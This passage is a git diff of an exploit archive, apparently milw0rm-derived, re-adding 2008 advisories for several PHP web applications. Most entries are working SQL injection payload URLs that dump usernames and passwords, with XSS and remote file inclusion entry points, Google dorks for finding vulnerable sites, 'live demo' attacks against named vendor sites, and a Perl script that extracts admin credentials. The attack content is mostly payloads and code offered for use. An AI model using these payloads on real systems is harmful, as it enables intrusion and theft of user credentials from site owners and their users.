-################################################################## -# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # -################################################################## - -# milw0rm.com [2008-06-23] +===================================================================================== + MyBlog: PHP and MySQL Blog/CMS software (SQL/XSS) Multiple Remote Vulnerabilities +===================================================================================== + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground Hacking Team .. + `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + + +AUTHOR : CWH Underground +DATE : 23 June 2008 +SITE : www.citec.us + + +##################################################### + APPLICATION : MyBlog: PHP and MySQL Blog/CMS software + DOWNLOAD : http://downloads.sourceforge.net/myblog +##################################################### + +--- Remote SQL Injection --- + +** Magic Quote must turn off ** + +---------- + Exploits +---------- + +[+] http://[Target]/os/index.php?view=[SQL Injection] +[+] http://[Target]/os/member.php?id=[SQL Injection] +[+] http://[Target]/os/post.php?id=[SQL Injection] + + **This exploits can get username and password (No Encryption)** + +-------------- + POC Exploits +-------------- + +[+] http://192.168.24.25/os/index.php?view=cwh'/**/UNION/**/SELECT/**/1,2,email,concat(user,0x3a,password),5,6,7,8,9,10,11/**/FROM/**/myblog_users/**/WHERE/**/perm='1 +[+] http://192.168.24.25/os/member.php?id=-9999'/**/UNION/**/SELECT/**/concat(user,0x3a,password),2,3,email,5,6,7,8,9,10/**/FROM/**/myblog_users/**/WHERE/**/perm='1 +[+] http://192.168.24.25/os/post.php?id=-9999'/**/UNION/**/SELECT/**/1,2,email,concat(user,0x3a,password),5,6,7,8,9,10,11/**/FROM/**/myblog_users/**/WHERE/**/perm='1 + + + +--- Remote XSS 
--- + +---------- + Exploits +---------- + +[+] http://[Target]/os/index.php?s=[XSS] +[+] http://[Target]/os/index.php?sort=[XSS] +[+] http://[Target]/os/post.php?id=[XSS] + + +################################################################## +# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # +################################################################## + +# milw0rm.com [2008-06-23] diff --git a/platforms/php/webapps/5914.txt b/platforms/php/webapps/5914.txt index 32429a965..d595ae360 100755 --- a/platforms/php/webapps/5914.txt +++ b/platforms/php/webapps/5914.txt 
@@ -1,67 +1,67 @@ -=============================================================== - Demo4 CMS (index.php id) Remote SQL Injection Vulnerability -=============================================================== - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - - -AUTHOR : CWH Underground -DATE : 23 June 2008 -SITE : www.citec.us - - -##################################################### - APPLICATION : Demo4 CMS - VERSION : Beta01 - VENDOR : N/A - DOWNLOAD : http://downloads.sourceforge.net/demo4 -##################################################### - ---- Remote SQL Injection --- - ------------------------------ - Vulnerable File [index.php] ------------------------------ - -@Line - - 8: if ($_GET['id']=="") - 9: $id = $startpage; - 10: else - 11: $id = $_GET['id']; - 12: database_connect(); - 13: $query = "SELECT * from content - 14: WHERE id = $id"; - 15: $error = mysql_error(); - ---------- - Exploit ---------- - -[+] http://[Target]/[demo4_path]/index.php?id=[SQL Injection] - - - **This exploits can get username and password (No Encryption)** - -------------- - POC Exploit -------------- - -[+] http://192.168.24.25/demo4/index.php?id=-9999/**/UNION/**/SELECT/**/1,userid,3,4,password,username,7,8/**/FROM/**/pages_t_users - - -################################################################## -# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # -################################################################## - -# milw0rm.com [2008-06-23] +=============================================================== + Demo4 CMS (index.php id) Remote SQL Injection Vulnerability +=============================================================== + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' 
| O .. CWH Underground Hacking Team .. + `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + + +AUTHOR : CWH Underground +DATE : 23 June 2008 +SITE : www.citec.us + + +##################################################### + APPLICATION : Demo4 CMS + VERSION : Beta01 + VENDOR : N/A + DOWNLOAD : http://downloads.sourceforge.net/demo4 +##################################################### + +--- Remote SQL Injection --- + +----------------------------- + Vulnerable File [index.php] +----------------------------- + +@Line + + 8: if ($_GET['id']=="") + 9: $id = $startpage; + 10: else + 11: $id = $_GET['id']; + 12: database_connect(); + 13: $query = "SELECT * from content + 14: WHERE id = $id"; + 15: $error = mysql_error(); + +--------- + Exploit +--------- + +[+] http://[Target]/[demo4_path]/index.php?id=[SQL Injection] + + + **This exploits can get username and password (No Encryption)** + +------------- + POC Exploit +------------- + +[+] http://192.168.24.25/demo4/index.php?id=-9999/**/UNION/**/SELECT/**/1,userid,3,4,password,username,7,8/**/FROM/**/pages_t_users + + +################################################################## +# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # +################################################################## + +# milw0rm.com [2008-06-23] diff --git a/platforms/php/webapps/5915.txt b/platforms/php/webapps/5915.txt index 473bcaac4..a33d4234a 100755 --- a/platforms/php/webapps/5915.txt +++ b/platforms/php/webapps/5915.txt 
@@ -1,29 +1,29 @@ -Title: Joomla Component Com_Facileforms - -================================================================ - -[+] Author : Dr.Kacak -[+] Special Thankz : KnocKout and all my friends -[+] System 0VerfL0verZ - -================================================================= - -Script : Joomla - -Google Dork : index.php?option=com_facileforms - -Error Code : facileforms.frame.php?ff_compath= - -Bug Fix Advice : Undefined değerler, tanımlanmalıdır. - -############################################################### - -< -- bug code start -- > - -www.site.com/path/components/com_facileforms/facileforms.frame.php?ff_compath=[SH3LL] - -/path/components/com_facileforms/facileforms.frame.php?ff_compath=[SH3LL] - -< -- bug code end of -- > - -# milw0rm.com [2008-06-23] +Title: Joomla Component Com_Facileforms + +================================================================ + +[+] Author : Dr.Kacak +[+] Special Thankz : KnocKout and all my friends +[+] System 0VerfL0verZ + +================================================================= + +Script : Joomla + +Google Dork : index.php?option=com_facileforms + +Error Code : facileforms.frame.php?ff_compath= + +Bug Fix Advice : Undefined değerler, tanımlanmalıdır. + +############################################################### + +< -- bug code start -- > + +www.site.com/path/components/com_facileforms/facileforms.frame.php?ff_compath=[SH3LL] + +/path/components/com_facileforms/facileforms.frame.php?ff_compath=[SH3LL] + +< -- bug code end of -- > + +# milw0rm.com [2008-06-23] diff --git a/platforms/php/webapps/5924.txt b/platforms/php/webapps/5924.txt index 8430d2874..5f4abba8e 100755 --- a/platforms/php/webapps/5924.txt +++ b/platforms/php/webapps/5924.txt 
@@ -1,100 +1,100 @@ -____________________ ___ ___ ________ -\_ _____/\_ ___ \ / | \\_____ \ - | __)_ / \ \// ~ \/ | \ - | \\ \___\ Y / | \ -/_______ / \______ /\___|_ /\_______ / - \/ \/ \/ \/ - - .OR.ID -ECHO_ADV_99$2008 - ------------------------------------------------------------------------------------------ -[ECHO_ADV_99$2008] Relative Real Estate Systems <= 3.0 (listing_id) Sql Injection Vulnerability ------------------------------------------------------------------------------------------ - -Author : M.Hasran Addahroni -Date : June, 24 th 2008 -Location : Jakarta, Indonesia -Web : http://e-rdc.org/v1/news.php?readmore=101 -Critical Lvl : Medium -Impact : System access -Where : From Remote ---------------------------------------------------------------------------- - -Affected software description: -~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Application : Relative Real Estate Systems -version : <= 3.0 -Vendor : http://www.dboorn.com/estate/ -Description : - -Elegant real estate script that allows for unlimited listings and agents with featured listings, -unlimited photos, advanced search engine, user login option, user tracking, dynamic slide shows, -Mls/Idx support, multiple agents with photo, mortgage calculator, schools info, C.M.A. -request form, full admin panel.Requires PHP/Mysql Windows Server or any Web server with php support. - ---------------------------------------------------------------------------- - -Vulnerability: -~~~~~~~~~~~~~ - -Input passed to the "listing_id" parameter in index.php is not properly verified before being used -in an sql query. -This can be exploited thru the browser to manipulate SQL queries and pull the username and password from realtors -and users in plain text. -Successful exploitation requires that "magic_quotes" is off. 
- - -Poc/Exploit: -~~~~~~~~~ - -http://[URL]/[path]/index.php?go=listings&listing_id=-30%20union%20select%201,2,3,4,5,6,7,8,concat(id,0x3a,username,0x3a,password,0x3a,email),0,1,2,3,4,5,6,7,8,9,0,1%20from%20realtors-- - -http://[URL]/[path]/index.php?go=listings&listing_id=-30%20union%20select%201,2,3,4,5,6,7,8,concat(username,0x3a,password),0,1,2,3,4,5,6,7,8,9,0,1%20from%20users-- - -Admin Login at http://[URL]/[PATH]/Admin/login_index.php - -Dork: -~~~~ -Google : "index.php?go=listings&listing" - - -Solution: -~~~~~~ - -- Edit the source code to ensure that input is properly verified. -- Turn on magic_quotes in php.ini - - -Timeline: -~~~~~~~~ - -- 24 - 06 - 2008 bug found -- 24 - 06 - 2008 vendor contacted -- 24 - 06 - 2008 advisory released ---------------------------------------------------------------------------- - -Shoutz: -~~~~ -~ ping - my dearest wife, zautha - my little warrior -~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,negative, -the_hydra,neng chika, str0ke -~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOCIATES -~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank, -super_temon, b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b -~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R, -kuntua, stev_manado,nofry,k1tk4t,0pt1c -~ newbie_hacker@yahoogroups.com -~ #aikmel #e-c-h-o @irc.dal.net - ---------------------------------------------------------------------------- -Contact: -~~~~~ - -K-159 || echo|staff || eufrato[at]gmail[dot]com -Homepage: http://www.e-rdc.org/ - --------------------------------- [ EOF ] ---------------------------------- - -# milw0rm.com [2008-06-24] +____________________ ___ ___ ________ +\_ _____/\_ ___ \ / | \\_____ \ + | __)_ / \ \// ~ \/ | \ + | \\ \___\ Y / | \ +/_______ / \______ /\___|_ /\_______ / + \/ \/ \/ \/ + + .OR.ID +ECHO_ADV_99$2008 + +----------------------------------------------------------------------------------------- 
+[ECHO_ADV_99$2008] Relative Real Estate Systems <= 3.0 (listing_id) Sql Injection Vulnerability +----------------------------------------------------------------------------------------- + +Author : M.Hasran Addahroni +Date : June, 24 th 2008 +Location : Jakarta, Indonesia +Web : http://e-rdc.org/v1/news.php?readmore=101 +Critical Lvl : Medium +Impact : System access +Where : From Remote +--------------------------------------------------------------------------- + +Affected software description: +~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Application : Relative Real Estate Systems +version : <= 3.0 +Vendor : http://www.dboorn.com/estate/ +Description : + +Elegant real estate script that allows for unlimited listings and agents with featured listings, +unlimited photos, advanced search engine, user login option, user tracking, dynamic slide shows, +Mls/Idx support, multiple agents with photo, mortgage calculator, schools info, C.M.A. +request form, full admin panel.Requires PHP/Mysql Windows Server or any Web server with php support. + +--------------------------------------------------------------------------- + +Vulnerability: +~~~~~~~~~~~~~ + +Input passed to the "listing_id" parameter in index.php is not properly verified before being used +in an sql query. +This can be exploited thru the browser to manipulate SQL queries and pull the username and password from realtors +and users in plain text. +Successful exploitation requires that "magic_quotes" is off. 
+ + +Poc/Exploit: +~~~~~~~~~ + +http://[URL]/[path]/index.php?go=listings&listing_id=-30%20union%20select%201,2,3,4,5,6,7,8,concat(id,0x3a,username,0x3a,password,0x3a,email),0,1,2,3,4,5,6,7,8,9,0,1%20from%20realtors-- + +http://[URL]/[path]/index.php?go=listings&listing_id=-30%20union%20select%201,2,3,4,5,6,7,8,concat(username,0x3a,password),0,1,2,3,4,5,6,7,8,9,0,1%20from%20users-- + +Admin Login at http://[URL]/[PATH]/Admin/login_index.php + +Dork: +~~~~ +Google : "index.php?go=listings&listing" + + +Solution: +~~~~~~ + +- Edit the source code to ensure that input is properly verified. +- Turn on magic_quotes in php.ini + + +Timeline: +~~~~~~~~ + +- 24 - 06 - 2008 bug found +- 24 - 06 - 2008 vendor contacted +- 24 - 06 - 2008 advisory released +--------------------------------------------------------------------------- + +Shoutz: +~~~~ +~ ping - my dearest wife, zautha - my little warrior +~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,negative, +the_hydra,neng chika, str0ke +~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOCIATES +~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank, +super_temon, b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b +~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R, +kuntua, stev_manado,nofry,k1tk4t,0pt1c +~ newbie_hacker@yahoogroups.com +~ #aikmel #e-c-h-o @irc.dal.net + +--------------------------------------------------------------------------- +Contact: +~~~~~ + +K-159 || echo|staff || eufrato[at]gmail[dot]com +Homepage: http://www.e-rdc.org/ + +-------------------------------- [ EOF ] ---------------------------------- + +# milw0rm.com [2008-06-24] diff --git a/platforms/php/webapps/5925.txt b/platforms/php/webapps/5925.txt index 516dbd9b3..6e9917681 100755 --- a/platforms/php/webapps/5925.txt +++ b/platforms/php/webapps/5925.txt 
@@ -1,51 +1,51 @@ -============================================================== - ShareCMS 0.1 Multiple Remote SQL Injection Vulnerabilities -============================================================== - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - - -AUTHOR : CWH Underground -DATE : 24 June 2008 -SITE : www.citec.us - - -##################################################### - APPLICATION : ShareCMS - VERSION : 0.1 Beta - VENDOR : N/A - DOWNLOAD : http://downloads.sourceforge.net/sharecms -##################################################### - ---- Remote SQL Injection --- - ----------- - Exploits ----------- - -[+] http://[Target]/[sharecms_path]/event_info.php?eventID[SQL Injection] -[+] http://[Target]/[sharecms_path]/list_user.php?userID=[SQL Injection] - --------------- - POC Exploits --------------- - -[+] http://192.168.24.25/sharecms/event_info.php?eventID=-9999/**/UNION/**/SELECT/**/1,2,3,username,5,6,7,8,9,10,11,12,password/**/FROM/**/user-- -[+] http://192.168.24.25/sharecms/list_user.php?userID=-9999/**/UNION/**/SELECT/**/1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11/**/FROM/**/user-- - - -################################################################## -# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # -################################################################## - -# milw0rm.com [2008-06-24] +============================================================== + ShareCMS 0.1 Multiple Remote SQL Injection Vulnerabilities +============================================================== + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground Hacking Team .. 
+ `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + + +AUTHOR : CWH Underground +DATE : 24 June 2008 +SITE : www.citec.us + + +##################################################### + APPLICATION : ShareCMS + VERSION : 0.1 Beta + VENDOR : N/A + DOWNLOAD : http://downloads.sourceforge.net/sharecms +##################################################### + +--- Remote SQL Injection --- + +---------- + Exploits +---------- + +[+] http://[Target]/[sharecms_path]/event_info.php?eventID[SQL Injection] +[+] http://[Target]/[sharecms_path]/list_user.php?userID=[SQL Injection] + +-------------- + POC Exploits +-------------- + +[+] http://192.168.24.25/sharecms/event_info.php?eventID=-9999/**/UNION/**/SELECT/**/1,2,3,username,5,6,7,8,9,10,11,12,password/**/FROM/**/user-- +[+] http://192.168.24.25/sharecms/list_user.php?userID=-9999/**/UNION/**/SELECT/**/1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11/**/FROM/**/user-- + + +################################################################## +# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # +################################################################## + +# milw0rm.com [2008-06-24] diff --git a/platforms/php/webapps/5928.txt b/platforms/php/webapps/5928.txt index 9875929b8..f88aa91e7 100755 --- a/platforms/php/webapps/5928.txt +++ b/platforms/php/webapps/5928.txt 
@@ -1,52 +1,52 @@ -################################################################################################# -#################################### proud to be muslim ###################################### -### ### -### rEm0te sql injction VulnErability ### -### ### -### Hivemaker script ### -### ### -### ### -################################################################################################# -################################################################################################# -### ### -### AuTh0r : security fears team ### -### ### -### H0ME : WwW.alsonaa.CoM ### -### ### -### members: HeB4RieH , germaya_x ### -### ### -################################################################################################# -################################################################################################# -### ### -### Script Name : Hivemaker ### -### ### -### download : http://www.scriptfactory.org/products.html ### -### ### -### download : http://www.hivemaker.com ### -################################################################################################# -################################################################################################# -### ### -### d0rk :: "use your mind " ### -### note :: 1-http://www.hivemaker.com/demo/admin/index.php (you can login from here) ### -### ### -### -(:: sql Code ::)- ### -### index.php?cid=(sql) ### -###(sql):-1+UNION+SELECT+1,2,3,concat_ws(0x3a3a,username,userpass,useremail),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+userinfo/* -### ### -################################################################################################# -### ### -### -(:: l!ve demo ::)- ### -### ### -###http://www.hivemaker.com/demo/sites/index.php?cid=-1+UNION+SELECT+1,2,3,concat_ws(0x3a3a,username,userpass,useremail),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+userinfo/* -### ### 
-### ### -######################## ##################### -######################## ##################### -################################################################################################# -################################################################################################# - -(:: !GreTzZ! ::)- -::ThE GeNeRal L0s3r::Mr.sql::fa6al error::black cheetah::members of alsonaa.com ::str0ke::MusliMs HaCkErs:: -################################################################################################# -################################################################################################# - -# milw0rm.com [2008-06-24] +################################################################################################# +#################################### proud to be muslim ###################################### +### ### +### rEm0te sql injction VulnErability ### +### ### +### Hivemaker script ### +### ### +### ### +################################################################################################# +################################################################################################# +### ### +### AuTh0r : security fears team ### +### ### +### H0ME : WwW.alsonaa.CoM ### +### ### +### members: HeB4RieH , germaya_x ### +### ### +################################################################################################# +################################################################################################# +### ### +### Script Name : Hivemaker ### +### ### +### download : http://www.scriptfactory.org/products.html ### +### ### +### download : http://www.hivemaker.com ### +################################################################################################# +################################################################################################# +### ### +### d0rk :: "use your mind " ### +### note :: 1-http://www.hivemaker.com/demo/admin/index.php (you can login from here) 
### +### ### +### -(:: sql Code ::)- ### +### index.php?cid=(sql) ### +###(sql):-1+UNION+SELECT+1,2,3,concat_ws(0x3a3a,username,userpass,useremail),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+userinfo/* +### ### +################################################################################################# +### ### +### -(:: l!ve demo ::)- ### +### ### +###http://www.hivemaker.com/demo/sites/index.php?cid=-1+UNION+SELECT+1,2,3,concat_ws(0x3a3a,username,userpass,useremail),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+userinfo/* +### ### +### ### +######################## ##################### +######################## ##################### +################################################################################################# +################################################################################################# + -(:: !GreTzZ! ::)- +::ThE GeNeRal L0s3r::Mr.sql::fa6al error::black cheetah::members of alsonaa.com ::str0ke::MusliMs HaCkErs:: +################################################################################################# +################################################################################################# + +# milw0rm.com [2008-06-24] diff --git a/platforms/php/webapps/5929.txt b/platforms/php/webapps/5929.txt index a9e735e95..26e42ff63 100755 --- a/platforms/php/webapps/5929.txt +++ b/platforms/php/webapps/5929.txt 
@@ -1,49 +1,49 @@ -######################################################### -# -# Viral DX 1 SQL Injection Vulnerability -#======================================================== -# -# Author: Hussin X -# -# Home : www.tryag.cc/cc -# -# email: darkangel_g85[at]Yahoo[DoT]com -# hussin.x[at]hotmail[DoT]com -# -#======================================================== -# HomE script : http://e-topbiz.com/ -# -# Demo : http://e-topbiz.com/trafficdemos/viraldx1/ -# -# -########################################################## - -Exploit: - -http://www.site.com/Script/adclick.php?bannerid=-1+union+select+concat_ws - -(0x3a,login,pass)+from+pass-- - - - -L!VE DEMO: - -http://e-topbiz.com/trafficdemos/viraldx1/adclick.php?bannerid=- - -1+union+select+concat_ws(0x3a,login,pass)+from+pass-- - - -LoGiN : - -/admin/login.php - - -################################################################################ -####################################( Greetz )################################## -# # -# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke # -# Silic0n / Rafi / FAHD / Iraqihack # -# # -#################################(and All IRAQIs)############################### - -# milw0rm.com [2008-06-24] +######################################################### +# +# Viral DX 1 SQL Injection Vulnerability +#======================================================== +# +# Author: Hussin X +# +# Home : www.tryag.cc/cc +# +# email: darkangel_g85[at]Yahoo[DoT]com +# hussin.x[at]hotmail[DoT]com +# +#======================================================== +# HomE script : http://e-topbiz.com/ +# +# Demo : http://e-topbiz.com/trafficdemos/viraldx1/ +# +# +########################################################## + +Exploit: + +http://www.site.com/Script/adclick.php?bannerid=-1+union+select+concat_ws + +(0x3a,login,pass)+from+pass-- + + + +L!VE DEMO: + +http://e-topbiz.com/trafficdemos/viraldx1/adclick.php?bannerid=- + 
+1+union+select+concat_ws(0x3a,login,pass)+from+pass-- + + +LoGiN : + +/admin/login.php + + +################################################################################ +####################################( Greetz )################################## +# # +# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke # +# Silic0n / Rafi / FAHD / Iraqihack # +# # +#################################(and All IRAQIs)############################### + +# milw0rm.com [2008-06-24] diff --git a/platforms/php/webapps/5930.txt b/platforms/php/webapps/5930.txt index 66465eddb..eae5efa34 100755 --- a/platforms/php/webapps/5930.txt +++ b/platforms/php/webapps/5930.txt 
@@ -1,52 +1,52 @@ -######################################################### -# -# Link ADS 1 SQL Injection Vulnerability -#======================================================== -# -# Author: Hussin X -# -# Home : www.tryag.cc/cc -# -# email: darkangel_g85[at]Yahoo[DoT]com -# hussin.x[at]hotmail[DoT]com -# -#======================================================== -# HomE script : http://e-topbiz.com/ -# -# Demo : http://e-topbiz.com/oprema/pages/linkads1.php -# -# DorK : out.php?linkid=1 -# DorK : inurl:"out.php?linkid=1" -########################################################## - -Exploit: - - -http://www.site.org/Script/out.php?linkid=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11-- - - - - -L!VE DEMO: - -http://e-topbiz.com/trafficdemos/linkads1/out.php?linkid=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11-- - - -LogiN: - - -/admin/ - - -################################################################################ -####################################( Greetz )################################## -# # -# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke # - -# Silic0n / Rafi / FAHD / Iraqihack # - -# # -#################################(and All IRAQIs)############################### -################################################################################ - -# milw0rm.com [2008-06-24] +######################################################### +# +# Link ADS 1 SQL Injection Vulnerability +#======================================================== +# +# Author: Hussin X +# +# Home : www.tryag.cc/cc +# +# email: darkangel_g85[at]Yahoo[DoT]com +# hussin.x[at]hotmail[DoT]com +# +#======================================================== +# HomE script : http://e-topbiz.com/ +# +# Demo : http://e-topbiz.com/oprema/pages/linkads1.php +# +# DorK : out.php?linkid=1 +# DorK : inurl:"out.php?linkid=1" +########################################################## + +Exploit: + + 
+http://www.site.org/Script/out.php?linkid=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11-- + + + + +L!VE DEMO: + +http://e-topbiz.com/trafficdemos/linkads1/out.php?linkid=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11-- + + +LogiN: + + +/admin/ + + +################################################################################ +####################################( Greetz )################################## +# # +# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke # + +# Silic0n / Rafi / FAHD / Iraqihack # + +# # +#################################(and All IRAQIs)############################### +################################################################################ + +# milw0rm.com [2008-06-24] diff --git a/platforms/php/webapps/5931.pl b/platforms/php/webapps/5931.pl index 0f1be8e97..269886991 100755 --- a/platforms/php/webapps/5931.pl +++ b/platforms/php/webapps/5931.pl 
@@ -1,61 +1,61 @@ -#!/usr/bin/perl -# k1tk4t Public Security Advisory -# //////////////////////////////////////////////////////////// -# TOKOKITA Multiple Remote SQL Injection -# Demosite : http://www.tokokita.net/toko/ -# Vendor : http://www.tokokita.com/ -# Kutu : 1. catlist.php?cat_id=[Blind SQLi] -# 2. catlist_detail.php?cat_id=[Blind SQLi] -# 3. barang.php?produk_id=[SQLi] -# Terimakasih untuk ; -# str0ke,DNX,n0c0py,L41n, -# NTOS-Team->[fl3xu5,opt1lc,sakitjiwa], -# eCHo->[y3dips,K-159,lirva32,dan staff lainnya] -use LWP::UserAgent; - -if ( !$ARGV[1] ) { - print "\n //////////////////////////////////////////////////////////////////"; - print "\n // ..::> k1tk4t <::.. //"; - print "\n // TOKOKITA (barang.php produk_id) Remote SQL Injection Exploit //"; - print "\n //////////////////////////////////////////////////////////////////"; - print "\n[!] "; - print "\n[!] Penggunaan : perl tokokita.pl [Site] [Path]"; - print "\n[!] Contoh : perl tokokita.pl localhost /toko/"; - print "\n[!] "; - print "\n"; - exit; -} -$site = $ARGV[0]; -$path = $ARGV[1]; -$sqlinj = "union+ -select+ -null, -null, -null, -concat(0x6b3174,email,0x316e), -null, -concat(0x6b3474,password,0x307574), -null, -null, -null, -null, -null+ -from+ -user_admin/*"; -$expl = "http://" . $site . $path . "barang.php?produk_id=-9+" -. $sqlinj; -$www = new LWP::UserAgent; -print "\n\n [!] Injeksi SQL \n"; -$res = $www->get($expl) or err (); -$hasil = $res->content; -if ( $hasil =~ /k1t(.*?)1n/ ) { - print "\n [+] Username : $1"; - $hasil =~ /k4t(.*?)0ut/, print "\n [+] Password : $1"; - print "\n\n"; -} -else { - print "\n [-] Exploit gagal ;)"; - exit(); -} - -# milw0rm.com [2008-06-24] +#!/usr/bin/perl +# k1tk4t Public Security Advisory +# //////////////////////////////////////////////////////////// +# TOKOKITA Multiple Remote SQL Injection +# Demosite : http://www.tokokita.net/toko/ +# Vendor : http://www.tokokita.com/ +# Kutu : 1. catlist.php?cat_id=[Blind SQLi] +# 2. 
catlist_detail.php?cat_id=[Blind SQLi] +# 3. barang.php?produk_id=[SQLi] +# Terimakasih untuk ; +# str0ke,DNX,n0c0py,L41n, +# NTOS-Team->[fl3xu5,opt1lc,sakitjiwa], +# eCHo->[y3dips,K-159,lirva32,dan staff lainnya] +use LWP::UserAgent; + +if ( !$ARGV[1] ) { + print "\n //////////////////////////////////////////////////////////////////"; + print "\n // ..::> k1tk4t <::.. //"; + print "\n // TOKOKITA (barang.php produk_id) Remote SQL Injection Exploit //"; + print "\n //////////////////////////////////////////////////////////////////"; + print "\n[!] "; + print "\n[!] Penggunaan : perl tokokita.pl [Site] [Path]"; + print "\n[!] Contoh : perl tokokita.pl localhost /toko/"; + print "\n[!] "; + print "\n"; + exit; +} +$site = $ARGV[0]; +$path = $ARGV[1]; +$sqlinj = "union+ +select+ +null, +null, +null, +concat(0x6b3174,email,0x316e), +null, +concat(0x6b3474,password,0x307574), +null, +null, +null, +null, +null+ +from+ +user_admin/*"; +$expl = "http://" . $site . $path . "barang.php?produk_id=-9+" +. $sqlinj; +$www = new LWP::UserAgent; +print "\n\n [!] Injeksi SQL \n"; +$res = $www->get($expl) or err (); +$hasil = $res->content; +if ( $hasil =~ /k1t(.*?)1n/ ) { + print "\n [+] Username : $1"; + $hasil =~ /k4t(.*?)0ut/, print "\n [+] Password : $1"; + print "\n\n"; +} +else { + print "\n [-] Exploit gagal ;)"; + exit(); +} + +# milw0rm.com [2008-06-24] diff --git a/platforms/php/webapps/5932.txt b/platforms/php/webapps/5932.txt index 4af5525c3..8ebb3b39b 100755 --- a/platforms/php/webapps/5932.txt +++ b/platforms/php/webapps/5932.txt 
@@ -1,49 +1,49 @@ -========================================================================= - Webdevindo-CMS 0.1 (index.php hal) Remote SQL Injection Vulnerability -========================================================================= - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - - -AUTHOR : CWH Underground -DATE : 25 June 2008 -SITE : www.citec.us - - -##################################################### - APPLICATION : Webdevindo-CMS - VERSION : 1.0.0 - VENDOR : N/A - DOWNLOAD : http://downloads.sourceforge.net/webdevindo-cms -##################################################### - ---- Remote SQL Injection --- - ---------- - Exploit ---------- - -[+] http://[Target]/[webdevindo_path]/index.php?hal=[SQL Injection] - -------------- - POC Exploit -------------- - -[+] http://192.168.24.25/webdevindo/index.php?hal=-99999'/**/union/**/select/**/Password/**/from/**/jos_user/**/where/**/LoginName='admin - - -################################################################## -# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # -################################################################## - -# milw0rm.com [2008-06-25] +========================================================================= + Webdevindo-CMS 0.1 (index.php hal) Remote SQL Injection Vulnerability +========================================================================= + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground Hacking Team .. 
